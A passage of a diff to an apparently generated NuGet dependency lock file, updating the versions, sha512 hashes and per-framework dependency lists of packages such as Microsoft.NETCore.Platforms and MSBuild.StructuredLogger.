"System.Threading.Tasks.Extensions"], "net6.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "net7.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net8.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "net9.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.CodeAnalysis.Analyzers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Reflection.Metadata", "System.Threading.Channels"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", 
"System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp2.2": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netcoreapp3.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", 
"System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"], "netstandard2.1": ["Microsoft.CodeAnalysis.Common", "Microsoft.CodeAnalysis.CSharp", "Microsoft.CodeAnalysis.Workspaces.Common", "Humanizer.Core", "Microsoft.Bcl.AsyncInterfaces", "Microsoft.CodeAnalysis.Analyzers", "System.Buffers", "System.Collections.Immutable", "System.Composition", "System.IO.Pipelines", "System.Memory", "System.Numerics.Vectors", "System.Reflection.Metadata", "System.Runtime.CompilerServices.Unsafe", "System.Text.Encoding.CodePages", "System.Threading.Channels", "System.Threading.Tasks.Extensions"]}, "targeting_pack_overrides": [], "framework_list": []}, 
@@ -27,47 +27,47 @@ def main(): {"name": "Microsoft.Extensions.ObjectPool", "id": "Microsoft.Extensions.ObjectPool", "version": "9.0.0", "sha512": "sha512-dY64S9XmssfAjwvuGMHleFj2cKIhIFUU2D+Kr1D1Y+92mAPN/39HQMJay2FHxSRcDEI9hATivRV/I1N7QxVJcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.StringTools", "id": "Microsoft.NET.StringTools", "version": "17.12.6", "sha512": "sha512-uCT/G0W1wUteqfrriWHfLfFmArka8ISo6nUkC5gQzYZYm2PSTuqfS14DEsY0gqDuQpcLLLaYTDcEM0SA2Za5vA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Memory", 
"System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.NET.Test.Sdk", "id": "Microsoft.NET.Test.Sdk", "version": "17.12.0", "sha512": "sha512-hGf8I8+yo15etavoMd+7OXcOG6/G7HYPDEJg5aQnhMzsxaUpq+udNZzSxmEN9rGTWMZOAVFcyNXNL7YBsN6chw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": ["Microsoft.CodeCoverage"], "net47": ["Microsoft.CodeCoverage"], "net471": ["Microsoft.CodeCoverage"], "net472": ["Microsoft.CodeCoverage"], "net48": ["Microsoft.CodeCoverage"], "net5.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net6.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net7.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net8.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "net9.0": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.TestHost", "Microsoft.CodeCoverage"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], 
"netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "1.1.1", "sha512": "sha512-mDUJD1eLXIzmUnWCzWlmNQZGDp/cVGT8KyhzMcJNk2nlfdFUOoZai9idT8/FacJr8Nv8zhAmdf39FHm5qWUoGQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "Microsoft.NETCore.Targets", "id": "Microsoft.NETCore.Targets", "version": "1.1.3", "sha512": "sha512-pxwq8g2PYRiEF5KXVjmZFMNTqsg2Gr1puv/pR1sqAduAKHAGbaCuJ6+yc3pAJseClQUD29S2Ubrm7n/ZD78dUg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": 
[], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.NETCore.Platforms", "id": "Microsoft.NETCore.Platforms", "version": "7.0.4", "sha512": "sha512-mcQWjuDBh4WHGG4WcBI0k025WAdA2afMm6fs42sm1f+3gRyNQUiuMVT5gAWNUGSHmlu6qn/TCnAQpfl4Gm6cBw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "Microsoft.NETCore.Targets", "id": "Microsoft.NETCore.Targets", "version": "5.0.0", "sha512": "sha512-hYHm3JAjQO/nySxcl1EpZhYEW+2P3H1eLZNr+QxgO5TnLS6hqtfi5WchjQzjid45MYmhy2X7IOmcWtDP4fpMGw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], 
"netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.ObjectModel", "id": "Microsoft.TestPlatform.ObjectModel", "version": "17.12.0", "sha512": "sha512-klsXMgAPNWYo3ceakLkod4wYrk4lAV2Ehi676zUKgiVpQ5Yj6q3vsMhk/3pm97Ltk/hdcSW0rJKJvcQvTzPgYA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Reflection.Metadata"], "net462": ["System.Reflection.Metadata"], "net47": ["System.Reflection.Metadata"], "net471": ["System.Reflection.Metadata"], "net472": ["System.Reflection.Metadata"], "net48": ["System.Reflection.Metadata"], "net5.0": ["System.Reflection.Metadata"], "net6.0": ["System.Reflection.Metadata"], "net7.0": ["System.Reflection.Metadata"], "net8.0": ["System.Reflection.Metadata"], "net9.0": ["System.Reflection.Metadata"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["System.Reflection.Metadata"], "netcoreapp2.1": ["System.Reflection.Metadata"], "netcoreapp2.2": ["System.Reflection.Metadata"], "netcoreapp3.0": ["System.Reflection.Metadata"], "netcoreapp3.1": ["System.Reflection.Metadata"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["System.Reflection.Metadata"], "netstandard2.1": ["System.Reflection.Metadata"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.TestPlatform.TestHost", "id": "Microsoft.TestPlatform.TestHost", "version": "17.12.0", "sha512": "sha512-gYM2BOGQvFEP2fZt61f3f5Gu+imL1G1bvGUrbJjpYcl66R6uzs5yESg0XMn8IgUgldz8RldOOaYmjk2KcSeG1Q==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], 
"net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net6.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net7.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net8.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "net9.0": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": ["Microsoft.TestPlatform.ObjectModel", "Newtonsoft.Json"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Microsoft.Win32.Primitives", "id": "Microsoft.Win32.Primitives", "version": "4.3.0", "sha512": "sha512-Nm8Hp51y9tYcK3xD6qk43Wjftrg1mdH24CCJsTb6gr7HS21U1uA+CKPGEtUcVZbjU1y8Kynzm5eoJ7Pnx5gm8A==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net6.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net7.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net8.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "net9.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp1.1": 
["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp2.2": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netcoreapp3.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.4": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.5": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard1.6": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.0": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"], "netstandard2.1": ["Microsoft.NETCore.Platforms", "Microsoft.NETCore.Targets", "System.Runtime"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Mono.Posix.NETStandard", "id": "Mono.Posix.NETStandard", "version": "1.0.0", "sha512": "sha512-RtGiutQZJAmajvQ0QvBvh73VJye85iW9f9tjZlzF88idLxNMo4lAktP/4Y9ilCpais0LDO0tpoICt9Hdv6wooA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], 
"netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.243", "sha512": "sha512-Egw6dLclkDtfoVK+ncghRfYDEWiHjjmhbJFdqeZfqL/Ddtg+JoHzSMblBBTrn317coXZ7WMDELW3C9ZCpn0ByQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard": [], "netstandard1.0": [], 
"netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core"]}, "targeting_pack_overrides": [], "framework_list": []}, + {"name": "MSBuild.StructuredLogger", "id": "MSBuild.StructuredLogger", "version": "2.2.386", "sha512": "sha512-m8ErawcbeDJ+nWtN62vh2OPHARvLpSqhOBCedtYniPGB059wSs2vuGPxfBcVGqVcjpZgntEY4vDOzGyAVB7atA==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", 
"System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net7.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net8.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable"], "net9.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable"], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp2.2": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netcoreapp3.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"], "netstandard2.1": ["Microsoft.Build.Framework", "Microsoft.Build.Utilities.Core", "System.Collections.Immutable", "System.Memory", "System.Runtime.CompilerServices.Unsafe"]}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "Newtonsoft.Json", "id": 
"Newtonsoft.Json", "version": "13.0.3", "sha512": "sha512-mbJSvHfRxfX3tR/U6n1WU+mWHXswYc+SB/hkOpx8yZZe68hNZGfymJu0cjsaJEkVzCMqePiU6LdIyogqfIn7kg==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, {"name": "System.Buffers", "id": "System.Buffers", "version": "4.6.0", "sha512": "sha512-iRbJyTSX9bJVpURLGLiW8Fgk5Vfm5iGCztw4IG4IJYcxJy+BXTCEgEWFeJtO6c+kPnUmQu87KK5m188+qbErcQ==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": [], "net462": [], "net47": [], "net471": [], "net472": [], "net48": [], "net5.0": [], "net6.0": [], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": [], "netcoreapp2.1": [], "netcoreapp2.2": [], "netcoreapp3.0": [], "netcoreapp3.1": [], "netstandard": [], "netstandard1.0": [], "netstandard1.1": [], "netstandard1.2": [], "netstandard1.3": [], "netstandard1.4": [], "netstandard1.5": [], "netstandard1.6": [], "netstandard2.0": [], "netstandard2.1": []}, "targeting_pack_overrides": [], "framework_list": []}, - {"name": "System.Collections.Immutable", "id": "System.Collections.Immutable", "version": "8.0.0", "sha512": 
"sha512-BXqVkcIrhimvvem6q2ChWkuW6XYYirvb6FlhvuwaMoBqBdpcr4nehJBKP65Tw40UqcUM6oDoODsecM0yjZ6AUw==", "sources": ["https://api.nuget.org/v3/index.json"], "dependencies": {"net11": [], "net20": [], "net30": [], "net35": [], "net40": [], "net403": [], "net45": [], "net451": [], "net452": [], "net46": [], "net461": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net462": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net47": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net471": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net472": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net48": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net5.0": ["System.Memory", "System.Runtime.CompilerServices.Unsafe"], "net6.0": ["System.Runtime.CompilerServices.Unsafe"], "net7.0": [], "net8.0": [], "net9.0": [], "netcoreapp1.0": [], "netcoreapp1.1": [], "netcoreapp2.0": 